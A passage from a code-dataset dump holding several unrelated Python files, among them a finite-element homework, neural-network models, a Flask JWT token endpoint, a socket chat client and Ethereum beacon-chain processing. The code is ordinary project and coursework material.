V_h(Mesh(x_fine))\nu=solve_poisson_dirichelet(v_h_fine, f, sigma, u_dirichlet)\n\n# Create initial mesh\nx = np.linspace(0,L,11)\nv_h = V_h(Mesh(x))\n\nl2_err = 9e+3; it=0\nwhile True:\n # Iterate\n v_h = V_h(Mesh(x))\n \n # Estimate solution\n u_h=solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n # Compute error on current mesh\n err = lambda x : np.square(u(x)-u_h(x))\n l2_err = np.sqrt(integrate.quad(err,0,L)[0])\n \n if l2_err < 1e-3:\n break\n \n \"\"\"\n # Element residual\n resid = np.zeros(len(x))\n for i in range(1,len(x)-1):\n h = max(x[i+1]-x[i],x[i]-x[i-1])\n d2 = (u(x[i]-h)-2*u(x[i])+u(x[i]+h))/h**2\n resid[i] = abs(f(x[i]) + .1*d2)\n \"\"\"\n \n # Element residual\n rho = np.zeros(len(x)-1)\n for i in range(len(x)-1):\n h = x[i+1] - x[i]\n f_sq = lambda x : np.square(f(x))\n l2_i = np.sqrt(integrate.quad(f_sq,x[i],x[i+1])[0])\n rho[i] = h*l2_i\n \n \"\"\"\n # Refine (ref will never be 0 or L unless exact)\n ref = np.argmax(resid+1)\n x=np.insert(x,ref+1,(x[ref]+x[ref+1])/2)\n x=np.insert(x,ref,(x[ref-1]+x[ref])/2)\n \"\"\"\n \n # Refine\n alpha = .9\n for i in range(len(x)-1):\n if rho[i] > alpha*np.max(rho):\n x=np.append(x,(x[i]+x[i+1])/2)\n x=np.sort(x)\n \n it += 1\n #print(l2_err)\n\nfig,pl = plt.subplots()\npl.plot(x_fine,u(x_fine),label=\"Fine Solution\",color=\"orange\")\npl.plot(x,u_h(x),label=\"Results\",color=\"turquoise\")\npl.set(title=\"u Estimation (%d refinements, %d intervals)\" % (it,len(x)-1))\npl.legend()\n\nif save:\n fig.savefig(\"C.b.1.png\")\nplt.show()\n\n\n# In[ ]:\n\n\n# Try and compare for multiple L\ndata = []\nfor L in range(1,4):\n # Create sources\n sigma = lambda x : .1 + 0*x\n f = lambda x : np.exp(-(x-L/2)**2/(2*sigma(x)))\n u_dirichlet = [0,0]\n\n # Find reference solution\n x_fine = np.linspace(0,L,1001)\n v_h_fine = V_h(Mesh(x_fine))\n u=solve_poisson_dirichelet(v_h_fine, f, sigma, u_dirichlet)\n\n # Create initial mesh\n x = np.linspace(0,L,11)\n v_h = V_h(Mesh(x))\n\n l2_err = 9e+3; it=0\n while True:\n # Iterate\n v_h = V_h(Mesh(x))\n\n # Estimate solution\n u_h=solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n\n # Compute error on current mesh\n err = lambda x : np.square(u(x)-u_h(x))\n l2_err = np.sqrt(integrate.quad(err,0,L)[0])\n\n if l2_err < 1e-3:\n break\n\n \"\"\"\n # Element residual\n resid = np.zeros(len(x))\n for i in range(1,len(x)-1):\n h = max(x[i+1]-x[i],x[i]-x[i-1])\n d2 = (u(x[i]-h)-2*u(x[i])+u(x[i]+h))/h**2\n resid[i] = abs(f(x[i]) + .1*d2)\n \"\"\"\n\n # Element residual\n rho = np.zeros(len(x)-1)\n for i in range(len(x)-1):\n h_i = x[i+1] - x[i]\n f_sq = lambda x : np.square(f(x))\n l2_i = np.sqrt(integrate.quad(f_sq,x[i],x[i+1])[0])\n rho[i] = h_i*l2_i\n\n \"\"\"\n # Refine (ref will never be 0 or L unless exact)\n ref = np.argmax(resid+1)\n x=np.insert(x,ref+1,(x[ref]+x[ref+1])/2)\n x=np.insert(x,ref,(x[ref-1]+x[ref])/2)\n \"\"\"\n\n # Refine\n alpha = .9\n for i in range(len(x)-1):\n if rho[i] > alpha*np.max(rho):\n x=np.append(x,(x[i]+x[i+1])/2)\n x=np.sort(x)\n\n it += 1\n intervals = len(x)-1\n \n l2_err = 9e+3; n=20#intervals\n while True:\n # Find reference solution\n x = np.linspace(0,L,n+1)\n v_h = V_h(Mesh(x))\n u_h = solve_poisson_dirichelet(v_h, f, sigma, u_dirichlet)\n \n # Compute error on current mesh\n err = lambda x : np.square(u(x)-u_h(x))\n l2_err = np.sqrt(integrate.quad(err,0,L)[0])\n \n if l2_err < 1e-3:\n break\n \n n += 5\n \n data.append([L,n,intervals])\n #print(data[-1])\n \ndata = np.array(data)\nfig,pl = plt.subplots()\npl.plot(data[:,0],data[:,1],label=\"Equispaced\",color=\"orange\")\npl.plot(data[:,0],data[:,2],label=\"Dyadic\",color=\"turquoise\")\npl.set(xlabel=\"L\",ylabel=\"$L^2$ Squared Derivative Error\",title=\"L vs Number of Intervals\")\npl.legend()\n\nif save:\n fig.savefig(\"C.b.2.png\")\nplt.show()\n\n\n# In[ ]:\n\n\n\n\n","sub_path":"Kalafut_Noah-Cohen_HW1/hw_1.py","file_name":"hw_1.py","file_ext":"py","file_size_in_byte":17865,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"17619","text":"\"\"\"\nSet parameters for neural network model here. Test how many different \nconvolutional and linear layers is optimal for your task. Remember the larger\nthe number of outputs the more ram is needed. Also choose an activation function,\nF.relu is standard.\n\"\"\"\n\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass Net(nn.Module):\n def __init__(self):\n super().__init__()\n self.conv1 = nn.Conv2d(1, 32, 5) # 1 image, 32 outputs, 5x5 kernel\n self.conv2 = nn.Conv2d(32, 64, 5)\n self.conv3 = nn.Conv2d(64, 128, 5)\n\n # Pass through random data to find shape of conv3 output\n x = torch.randn(128, 72).view(-1, 1, 128, 72)\n self._to_linear = None\n self.convs(x)\n\n self.fc1 = nn.Linear(self._to_linear, 512) # flattening\n self.fc2 = nn.Linear(512, 2) # 2 output classes\n\n def convs(self, x):\n \"\"\"Applies activation function on convolutional layers of network\"\"\"\n x = F.max_pool2d(F.relu(self.conv1(x)), (2,2)) # max pooling over 2x2\n x = F.max_pool2d(F.relu(self.conv2(x)), (2,2))\n x = F.max_pool2d(F.relu(self.conv3(x)), (2,2))\n\n # Finds shape for flattening\n if self._to_linear is None:\n self._to_linear = x[0].shape[0]*x[0].shape[1]*x[0].shape[2]\n return x\n\n def forward(self, x):\n \"\"\"Applies activation function on linear layers of network\"\"\"\n x = self.convs(x)\n x = x.view(-1, self._to_linear) # .view is reshape, flattens x before\n x = F.relu(self.fc1(x))\n x = self.fc2(x)\n # return F.softmax(x, dim=1)\n return x\nnet = Net()\nprint(net)","sub_path":"detector/nn_model.py","file_name":"nn_model.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"231403670","text":"\n#for converting mp3 to wav files\nimport os\nfrom pydub import AudioSegment\n\nos.chdir(\"C:/Users/Arzoo/Desktop/ScalableProject3/images\")\n\naudio_files = os.listdir()\n\n# picking up mp3 audio files in the folder \nfor file in audio_files:\n name, ext = os.path.splitext(file)\n if ext == \".mp3\":\n mp3_sound = AudioSegment.from_mp3(file)\n #saving the wav files\n mp3_sound.export(\"{0}.wav\".format(name), format=\"wav\")","sub_path":"ConvertMp3ToWav.py","file_name":"ConvertMp3ToWav.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"565561512","text":"from flask import request\n# from flask_restful import Resource\nfrom flask_restplus import Resource, Namespace\n\nimport datetime\nimport jwt\n\n'''\nparkjp 18.12.11\nrest CRUD 구현\nC(POST) : 토큰관련 서비스 ...\nR(GET) : 토큰관련 서비스 ...\nU(PUT) : 토큰관련 서비스 ...\nD(DELETE) : 토큰관련 서비스 ...\n'''\nsecretKey = 'ai_data_discovery_crawler'\n\napi = Namespace('register', description='관리')\nauth_ip = ['localhost', '127.0.0.1']\nclass tokenRegister(Resource):\n\n def __init__(self, *args, **kwargs):\n logger = kwargs['logger']\n self.logger = logger\n self.api = api\n\n # 새로운 토큰 발급\n def post(self):\n\n # '''\n # header로 암호화된 id/ password 검증을 통해 token을 발급해야 한다\n # '''\n id = ''\n password = ''\n\n # request가 ip List에 존재할 경우에만 토큰을 준다\n\n if request.remote_addr in auth_ip :\n\n issuer = 'parkjp'\n\n subject = 'ai_data_discovery'\n # 토큰의 만료 날자\n date_time_obj = datetime.datetime\n exp_time = date_time_obj.timestamp(date_time_obj.utcnow() + datetime.timedelta(days=1))\n scope = ['crawler']\n\n payload = {\n 'sub': subject,\n 'iss': issuer,\n 'exp': int(exp_time),\n 'scope': scope,\n 'aud' : request.remote_addr\n }\n\n token = jwt.encode(payload, secretKey, algorithm='HS256')\n\n return {\n 'msg': '새로운 토큰이 생성 되었습니다.',\n 'access_token': str(token)\n }\n\n else :\n return {\n 'msg': '토큰 발급 조건을 확인 하세요'\n }\n\n","sub_path":"register/token/tokenRegister.py","file_name":"tokenRegister.py","file_ext":"py","file_size_in_byte":1595,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"424100805","text":"import mysql.connector\nfrom conf import load_config\nimport app\nimport logging\n\nlogger = logging.getLogger(__name__)\n\n\nclass MysqlDB(object):\n def __init__(self):\n self.config = {\n 'host': app.config.MYSQL_HOST, 'user': app.config.MYSQL_USERNAME,\n 'passwd': app.config.MYSQL_PASSWORD, 'db': app.config.MYSQL_DB,\n 'port': app.config.MYSQL_PORT\n }\n\n def select(self, sql, args, size=None):\n conn = mysql.connector.connect(**self.config)\n logger.info('sql:%s' % sql)\n logger.info(args)\n logger.info(size)\n try:\n cur = conn.cursor()\n cur.execute(sql.replace('?', '%s'), args or ())\n if size:\n if size == 1:\n rs = cur.fetchone()\n else:\n rs = cur.fetchmany(size)\n else:\n rs = cur.fetchall()\n logger.info('rows returned:%s' % len(rs))\n return rs\n finally:\n cur.close()\n conn.close()\n\n def execute(self, sql, args):\n conn = mysql.connector.connect(**self.config)\n logger.info('sql:%s' % sql)\n logger.info(args)\n try:\n cur = conn.cursor()\n cur.execute(sql.replace('?', '%s'), args)\n affected = cur.rowcount\n conn.commit()\n except Exception as e:\n raise e\n finally:\n cur.close()\n conn.close()\n return affected\n\n","sub_path":"app/db/mysqldb.py","file_name":"mysqldb.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"91275742","text":"import torch\nfrom torch import nn, optim\nimport numpy as np\nimport torch.utils.data as Data\nimport time\n\nclass RLNet(nn.Module):\n def __init__(self):\n super(RLNet, self).__init__()\n self.conv = nn.Sequential(\n # 1 * 15 * 15\n nn.Conv2d(1, 4, 3), # 4 * 13 * 13\n nn.ReLU(),\n nn.Conv2d(4, 16, 3), # 16 * 11 * 11\n nn.ReLU(),\n nn.Conv2d(16, 64, 3), # 64 * 9 * 9\n nn.ReLU(),\n nn.Conv2d(64, 256, 3, padding=1), # 256 * 9 * 9\n nn.ReLU(),\n nn.MaxPool2d(3),\n # nn.Conv2d(256, 1024, 3), # 1024 * 7 * 7\n # nn.ReLU(), \n # nn.Conv2d(1024, 1024, 3), # 1024 * 5 * 5\n # nn.ReLU(),\n # nn.Conv2d(1024, 1024, 3), # 1024 * 3 * 3\n # nn.ReLU(),\n nn.Conv2d(256, 1024, 3), # 1024 * 1 * 1\n nn.ReLU(),\n )\n self.fc = nn.Sequential(\n nn.Linear(1024, 1024),\n nn.ReLU(),\n nn.Dropout(p=0.5),\n nn.Linear(1024, 512),\n nn.ReLU(),\n nn.Linear(512, 15**2)\n )\n\n def forward(self, board):\n # print(board.shape)\n self.eval()\n first_ = self.conv(board.float())\n first_ = first_.view(board.shape[0],-1)\n output = self.fc(first_)\n self.train()\n return output\n@torch.no_grad()\ndef test(net,board,device):\n net = net.to(device)\n board = board.view(1,1,15,15)\n board = board.to(device)\n probs = net(board)\n probs_softmax = nn.Softmax(dim=1)(probs)\n probs_softmax = probs_softmax.cpu()\n probs_rank_index = np.argsort(probs_softmax.numpy())\n for index in probs_rank_index[0][::-1]:\n x = int(index / 15)\n y = int(index % 15)\n if(board[0,0,x,y]==0):\n return x,y\n return -1,-1\n\ndef train(net,data_iterator,iswin,optim,device,num_epochs):\n net = net.to(device)\n print(\"train on \",device)\n loss = torch.nn.CrossEntropyLoss()\n\n for epoch in range(num_epochs):\n \n for X,y in data_iterator:\n X = X.to(device)\n y = y.to(device)\n label = torch.zeros((len(y)),device=device,dtype=torch.long)\n for i in range(len(y)):\n label[i] = int(y[i][0]*15 + y[i][1])\n y_hat = net(X)\n l = loss(y_hat,label)\n optim.zero_grad()\n l.backward()\n optim.step()","sub_path":"RL/RLNet.py","file_name":"RLNet.py","file_ext":"py","file_size_in_byte":2439,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"628304729","text":"import mariadb\nimport sys\nimport time\nfrom gpiozero import MotionSensor, LED\nfrom datetime import datetime\nfrom signal import pause\n\noutpin = LED(22)\npir = MotionSensor(27, sample_rate=1)\n\nFAN_ON_DURATION = 10 * 60\t\t# 10 min\n\ndef printMessage(msg):\n\tprint(f\"{str(datetime.now())} - \" + msg)\n\nprintMessage(\"Motion detection init...\")\n\ndef runfan():\n\toutpin.on()\n\tprintMessage(\"fan activated.\")\n\ttime.sleep(FAN_ON_DURATION)\n\toutpin.off()\n\tprintMessage(\"fan de-activated\")\n\n#\ndef logdb():\n\tepoch = int(time.time())\n\ttime_h = time.strftime('%Y-%m-%d %H:%M:%S', time.localtime(epoch))\n\ttry:\n\t\tcur.execute(\n\t\t\t\"INSERT INTO motion_detection (detector_name, detection_time_epoch, detection_time) VALUES (?, ?, ?)\",\n\t\t\t('pz-cat-litter', epoch, time_h))\n\t\tconn.commit()\n\t\tprintMessage(f\"inserted id: {cur.lastrowid}\")\n\texcept mariadb.Error as e:\n\t\tprintMessage(f\"error: {e}\")\n\n\ndef on_motion_detected():\n\tlogdb()\n\trunfan()\n\n\n# Establish a connection\ntry:\n conn = mariadb.connect(\n user=username,\n password=password,\n host=\"localhost\",\n port=3306,\n database=\"exports\"\n\n )\n cur = conn.cursor()\nexcept mariadb.Error as e:\n printMessage(f\"error connecting to MariaDB Platform: {e}\")\n sys.exit(1)\n\nprintMessage(\"motion detection ready...\")\n\nwhile True:\n\tpir.wait_for_motion()\n\ton_motion_detected()\n","sub_path":"pi-cat-litter/motion_detection.py","file_name":"motion_detection.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"610969921","text":"from file_read import *\nfrom file_create import *\nfrom container import *\nfrom container_decorator import *\nfrom factory import *\nimport argparse\nimport sys\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('input')\n parser.add_argument('-o', '--output')\n p = parser.parse_args(sys.argv[1:])\n\n file_in = read(p.input)\n cont = ContainerDecorator(Container())\n fct = Factory()\n cont.read(file_in, fct)\n\n file_out = create(p.output)\n file_out.write('Заполненный контейнер:\\n')\n\n cont.write_round(file_out)\n\n file_out.write('\\nПустой контейнер:\\n')\n cont.clear()\n cont.write(file_out)\n\n file_out.close()\n\n print('Обработка прошла успешно!')\n\nif __name__ == '__main__':\n main()\n\n\n\n","sub_path":"_auto/lab6_2/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":805,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"635302181","text":"import torch\nimport torch.nn as nn\n\n\"\"\"\n t = expansion factor\n c = number of output channel\n n = repeat \n s = stride\n t c n s\n\"\"\"\nMobileNetV1_arch = [\n [1, 16, 1, 1],\n [6, 24, 2, 2],\n [6, 32, 3, 2],\n [6, 64, 4, 2],\n [6, 96, 3, 1],\n [6, 160, 3, 2],\n [6, 320, 1, 1],\n]\n\nclass DepthSepConvBlock(nn.Module):\n def __init__(self,in_channels,out_channels,stride):\n super(DepthSepConvBlock,self).__init__()\n self.depthwise = nn.Sequential(\n nn.Conv2d(in_channels,in_channels,kernel_size=3,stride=stride,padding=1,groups=in_channels,bias=False),\n nn.BatchNorm2d(in_channels),\n nn.ReLU6(inplace=True),\n )\n self.pointwise = nn.Sequential(\n nn.Conv2d(in_channels,out_channels,kernel_size=1,stride=1,bias=False),\n nn.BatchNorm2d(out_channels),\n )\n \n def forward(self,x):\n x = self.depthwise(x)\n x = self.pointwise(x)\n return x\n \n \n\nclass BottleneckBlock(nn.Module):\n def __init__(self,in_channels,out_channels,expand_ratio,stride):\n super(BottleneckBlock,self).__init__()\n self.stride = stride\n self.expand_layer = nn.Sequential(\n nn.Conv2d(\n in_channels,\n in_channels*expand_ratio,\n kernel_size=1,\n stride=1,\n padding=0,\n bias=False,\n ),\n nn.BatchNorm2d(in_channels*expand_ratio),\n nn.ReLU6(inplace=True),\n )\n self.depthwise_separable_layer = DepthSepConvBlock(\n in_channels=in_channels*expand_ratio,\n out_channels=out_channels,\n stride=stride,\n )\n \n def forward(self,x):\n out = self.expand_layer(x)\n out = self.depthwise_separable_layer(out)\n if self.stride==1 and x.shape[1:] == out.shape[1:]:\n return x + out\n return out\n\nclass MobileNetV2(nn.Module):\n def __init__(self,num_classes=10):\n super(MobileNetV2,self).__init__()\n self.first_conv_channels = 32\n self.last_conv_channels = 1280\n \n self.initial_conv = nn.Sequential(\n nn.Conv2d(\n in_channels = 3,\n out_channels = self.first_conv_channels,\n kernel_size = 3,\n stride = 2,\n padding = 1\n ),\n nn.BatchNorm2d(self.first_conv_channels),\n )\n \n self.bottleneck_blocks = self.make_bottleneck(MobileNetV1_arch)\n \n self.last_layers = nn.Sequential(\n nn.Conv2d(\n in_channels=320,\n out_channels=1280,\n kernel_size=1,\n stride=1,\n ),\n nn.BatchNorm2d(1280),\n nn.ReLU6(inplace=True),\n nn.AvgPool2d(7),\n nn.Conv2d(\n in_channels=1280,\n out_channels=num_classes,\n kernel_size=1,\n )\n )\n \n \n def make_bottleneck(self,arch):\n in_channels = 32\n bottleneck = []\n for _,(t,c,n,s) in enumerate(arch):\n for i in range(n):\n if i == 1:\n s=1\n if i+1 != n:\n bottleneck.append(BottleneckBlock(in_channels,in_channels,t,s))\n else: \n bottleneck.append(BottleneckBlock(in_channels,c,t,s))\n in_channels = c\n return nn.Sequential(*bottleneck)\n \n def forward(self,x):\n x = self.initial_conv(x)\n x = self.bottleneck_blocks(x)\n x = self.last_layers(x).view(x.shape[0],-1)\n return x\n \n\nif __name__ == '__main__':\n net = MobileNetV2()\n x = torch.randn(6,3,224,224)\n print(net(x).shape)","sub_path":"PyTorch/Classification/mobilenetv2/arch.py","file_name":"arch.py","file_ext":"py","file_size_in_byte":3815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"573197513","text":"from typing import (\n Iterable,\n)\nfrom eth_utils import (\n to_tuple,\n ValidationError,\n)\n\nfrom eth2.beacon.configs import (\n BeaconConfig,\n CommitteeConfig,\n)\nfrom eth2.beacon.validator_status_helpers import (\n initiate_validator_exit,\n slash_validator,\n)\nfrom eth2.beacon.typing import (\n ValidatorIndex,\n)\nfrom eth2.beacon.committee_helpers import (\n slot_to_epoch,\n)\nfrom eth2.beacon.types.attester_slashings import AttesterSlashing\nfrom eth2.beacon.types.blocks import BaseBeaconBlock\nfrom eth2.beacon.types.pending_attestation_records import PendingAttestationRecord\nfrom eth2.beacon.types.states import BeaconState\n\nfrom .block_validation import (\n validate_attestation,\n validate_attester_slashing,\n validate_proposer_slashing,\n validate_slashable_indices,\n validate_voluntary_exit,\n)\n\n\ndef process_proposer_slashings(state: BeaconState,\n block: BaseBeaconBlock,\n config: BeaconConfig) -> BeaconState:\n if len(block.body.proposer_slashings) > config.MAX_PROPOSER_SLASHINGS:\n raise ValidationError(\n f\"The block ({block}) has too many proposer slashings:\\n\"\n f\"\\tFound {len(block.body.proposer_slashings)} proposer slashings, \"\n f\"maximum: {config.MAX_PROPOSER_SLASHINGS}\"\n )\n\n for proposer_slashing in block.body.proposer_slashings:\n validate_proposer_slashing(state, proposer_slashing, config.SLOTS_PER_EPOCH)\n\n state = slash_validator(\n state=state,\n index=proposer_slashing.proposer_index,\n latest_slashed_exit_length=config.LATEST_SLASHED_EXIT_LENGTH,\n whistleblower_reward_quotient=config.WHISTLEBLOWER_REWARD_QUOTIENT,\n max_deposit_amount=config.MAX_DEPOSIT_AMOUNT,\n committee_config=CommitteeConfig(config),\n )\n\n return state\n\n\n@to_tuple\ndef _get_slashable_indices(state: BeaconState,\n config: BeaconConfig,\n attester_slashing: AttesterSlashing) -> Iterable[ValidatorIndex]:\n for index in attester_slashing.slashable_attestation_1.validator_indices:\n should_be_slashed = (\n index in attester_slashing.slashable_attestation_2.validator_indices and\n not state.validator_registry[index].slashed\n )\n if should_be_slashed:\n yield index\n\n\ndef process_attester_slashings(state: BeaconState,\n block: BaseBeaconBlock,\n config: BeaconConfig) -> BeaconState:\n if len(block.body.attester_slashings) > config.MAX_ATTESTER_SLASHINGS:\n raise ValidationError(\n f\"The block ({block}) has too many attester slashings:\\n\"\n f\"\\tFound {len(block.body.attester_slashings)} attester slashings, \"\n f\"maximum: {config.MAX_ATTESTER_SLASHINGS}\"\n )\n\n for attester_slashing in block.body.attester_slashings:\n validate_attester_slashing(\n state,\n attester_slashing,\n config.MAX_INDICES_PER_SLASHABLE_VOTE,\n config.SLOTS_PER_EPOCH,\n )\n\n slashable_indices = _get_slashable_indices(state, config, attester_slashing)\n\n validate_slashable_indices(slashable_indices)\n for index in slashable_indices:\n state = slash_validator(\n state=state,\n index=index,\n latest_slashed_exit_length=config.LATEST_SLASHED_EXIT_LENGTH,\n whistleblower_reward_quotient=config.WHISTLEBLOWER_REWARD_QUOTIENT,\n max_deposit_amount=config.MAX_DEPOSIT_AMOUNT,\n committee_config=CommitteeConfig(config),\n )\n\n return state\n\n\ndef process_attestations(state: BeaconState,\n block: BaseBeaconBlock,\n config: BeaconConfig) -> BeaconState:\n \"\"\"\n Implements 'per-block-processing.operations.attestations' portion of Phase 0 spec:\n https://github.com/ethereum/eth2.0-specs/blob/master/specs/core/0_beacon-chain.md#attestations-1\n\n Validate the ``attestations`` contained within the ``block`` in the context of ``state``.\n If any invalid, throw ``ValidationError``.\n Otherwise, append a ``PendingAttestationRecords`` for each to ``previous_epoch_attestations``\n or ``current_epoch_attestations``.\n Return resulting ``state``.\n \"\"\"\n if len(block.body.attestations) > config.MAX_ATTESTATIONS:\n raise ValidationError(\n f\"The block ({block}) has too many attestations:\\n\"\n f\"\\tFound {len(block.body.attestations)} attestations, \"\n f\"maximum: {config.MAX_ATTESTATIONS}\"\n )\n\n for attestation in block.body.attestations:\n validate_attestation(\n state,\n attestation,\n config.MIN_ATTESTATION_INCLUSION_DELAY,\n config.LATEST_BLOCK_ROOTS_LENGTH,\n CommitteeConfig(config),\n )\n\n # update attestations\n previous_epoch = state.previous_epoch(config.SLOTS_PER_EPOCH, config.GENESIS_EPOCH)\n current_epoch = state.current_epoch(config.SLOTS_PER_EPOCH)\n new_previous_epoch_pending_attestations = []\n new_current_epoch_pending_attestations = []\n for attestation in block.body.attestations:\n if slot_to_epoch(attestation.data.slot, config.SLOTS_PER_EPOCH) == current_epoch:\n new_current_epoch_pending_attestations.append(\n PendingAttestationRecord(\n data=attestation.data,\n aggregation_bitfield=attestation.aggregation_bitfield,\n custody_bitfield=attestation.custody_bitfield,\n slot_included=state.slot,\n )\n )\n elif slot_to_epoch(attestation.data.slot, config.SLOTS_PER_EPOCH) == previous_epoch:\n new_previous_epoch_pending_attestations.append(\n PendingAttestationRecord(\n data=attestation.data,\n aggregation_bitfield=attestation.aggregation_bitfield,\n custody_bitfield=attestation.custody_bitfield,\n slot_included=state.slot,\n )\n )\n\n state = state.copy(\n previous_epoch_attestations=(\n state.previous_epoch_attestations + tuple(new_previous_epoch_pending_attestations)\n ),\n current_epoch_attestations=(\n state.current_epoch_attestations + tuple(new_current_epoch_pending_attestations)\n ),\n )\n return state\n\n\ndef process_voluntary_exits(state: BeaconState,\n block: BaseBeaconBlock,\n config: BeaconConfig) -> BeaconState:\n if len(block.body.voluntary_exits) > config.MAX_VOLUNTARY_EXITS:\n raise ValidationError(\n f\"The block ({block}) has too many voluntary exits:\\n\"\n f\"\\tFound {len(block.body.voluntary_exits)} voluntary exits, \"\n f\"maximum: {config.MAX_VOLUNTARY_EXITS}\"\n )\n\n for voluntary_exit in block.body.voluntary_exits:\n validate_voluntary_exit(\n state,\n voluntary_exit,\n config.SLOTS_PER_EPOCH,\n config.PERSISTENT_COMMITTEE_PERIOD,\n )\n # Run the exit\n state = initiate_validator_exit(state, voluntary_exit.validator_index)\n\n return state\n","sub_path":"eth2/beacon/state_machines/forks/serenity/operation_processing.py","file_name":"operation_processing.py","file_ext":"py","file_size_in_byte":7353,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"309678981","text":"from tkinter import *\nfrom tkinter import messagebox \nimport socket\nfrom threading import Thread\n\nhostname = socket.gethostname()\nip = socket.gethostbyname(hostname)\nBUFSIZ = 1024\nclient_socket = None\nreceive_thread = None\nmessage = None\n\n# Disconnect From the server\ndef Disconnect():\n if(client_socket):\n client_socket.close()\n ConnectButton.configure(text = \"Connect\", command=Connect)\n sendButton.configure(state=\"disabled\")\n uname.configure(state=\"normal\")\n\n# Connect to Remote\ndef Connect():\n global client_socket\n global receive_thread\n\n try:\n # Assign resusable socket\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n client_socket.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)\n ADDR = (remote_ip.get(), int(remote_port.get()))\n print(\"Server Address: \",ADDR)\n # Attempt connection to server\n client_socket.connect(ADDR)\n receive_thread = Thread(target=RecvMessage)\n receive_thread.start()\n # Change Buttons and entry states\n ConnectButton.configure(text = \"Disconnect\", command=Disconnect)\n sendButton.configure(state=\"normal\")\n uname.configure(state=\"disabled\")\n # Announce to server that you have joined\n client_socket.sendall((uname.get() + \" has joined the server\" ).encode('utf-8'))\n except OSError as ex: # Server Declines Connection\n # print(\"Error: \",ex)\n print(\"Connection to Server failed\")\n except ValueError:\n print(\"Port should be a valid number\")\n\n# Receive Function\ndef RecvMessage():\n # loop that waits for messages\n while True:\n try:\n msg = client_socket.recv(BUFSIZ).decode(\"utf8\")\n msg_list.insert(END, msg)\n except OSError: # Possibly client has left the chat.\n print(\"You have been disconnected from the server\")\n Disconnect()\n break\n \n\n# Send Function\ndef SendMessage():\n msg = message.get(\"1.0\",END) # Retrives data from input field.\n message.delete(\"1.0\",END) # Clears input field.\n client_socket.send(bytes(uname.get() + \": \" + msg, \"utf8\")) # Send message\n\n\n\n\n\n# Function called on exit to terminate running threads and close sockets\ndef on_closing():\n if messagebox.askokcancel(\"Quit\", \"Do you want to quit?\"):\n if(client_socket):\n client_socket.close()\n if(receive_thread and receive_thread.is_alive()):\n receive_thread.join()\n mainWindow.destroy()\n# GUI\nmainWindow = Tk()\nmainWindow.title('Chat Application - Client')\n\nconfigFrame = Frame(mainWindow)\n# Set IP and Port along with username\nLabel(configFrame, text='IP Address').grid(row=0,column=0)\nLabel(configFrame, text='Name').grid(row=0,column=2)\nuname = Entry(configFrame,state=\"normal\")\nuname.grid(row=0,column=3)\nuname.insert(END,\"User\")\nLabel(configFrame, text='Port').grid(row=1)\nremote_ip = Entry(configFrame)\nremote_ip.insert(END, '127.0.0.1')\nremote_ip.grid(row=0, column=1)\nremote_port = Entry(configFrame)\nremote_port.insert(END, '8008')\nremote_port.grid(row=1, column=1)\n\nConnectButton = Button(configFrame, text='Connect', width=25, command=Connect)\nConnectButton.grid(row=1,column=2)\n\n# Show Current IP and Hostname\nLabel(configFrame, text=\"My IP: \").grid(row=2,column = 0)\nLabel(configFrame, text=ip).grid(row=2,column = 1)\nLabel(configFrame, text=\"My Hostname: \").grid(row=3,column = 0)\nLabel(configFrame, text=hostname).grid(row=3,column = 1)\n\nconfigFrame.grid(row=0)\n\n# Message Receive Box\nmessagesFrame = Frame(mainWindow)\nscrollbar = Scrollbar(messagesFrame) # To navigate through previous messages.\n# Following will contain the messages.\nmsg_list = Listbox(messagesFrame, height=15, width=50, bg=\"silver\",yscrollcommand=scrollbar.set)\nmsg_list.insert(0, \"- - - - - - Beginning of Chat - - - - - - -\")\nscrollbar.pack(side=RIGHT, fill=Y)\nmsg_list.pack(side=LEFT, fill=BOTH)\nmsg_list.pack()\nmessagesFrame.grid(row=4)\n\n# Send Message Box\nSendFrame = Frame(mainWindow)\nmessage = Text(SendFrame,height=4)\nmessage.grid(row=6,column=0)\nsendButton = Button(SendFrame, text='Send Message', width=20, command=SendMessage,state='disabled')\nsendButton.grid(row=6,column=1)\nSendFrame.grid(row=5)\n\nmainWindow.protocol(\"WM_DELETE_WINDOW\", on_closing)\nmainWindow.mainloop()","sub_path":"Client.py","file_name":"Client.py","file_ext":"py","file_size_in_byte":4301,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"208013432","text":" #!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nThis module contain reinforcement learning agents for various experimental tasks\nCreated on Mon Jan 21 13:50:01 2019\n\n@author: Dimitrije Markovic\n\"\"\"\n\nimport torch\nfrom torch import ones, zeros, arange\nfrom torch.distributions import Categorical\n\nfrom .agent import Discrete\n\n__all__ = [\n 'RLSocInf',\n 'RLTempRevLearn'\n]\n\nclass RLSocInf(Discrete):\n \n def __init__(self, runs=1, blocks=1, trials=1):\n \n na = 2 # number of actions\n ns = 2 # number of states\n no = 2 # number of outcomes\n super(RLSocInf, self).__init__(runs, blocks, trials, na, ns, no)\n \n def set_parameters(self, x=None):\n \n if x is not 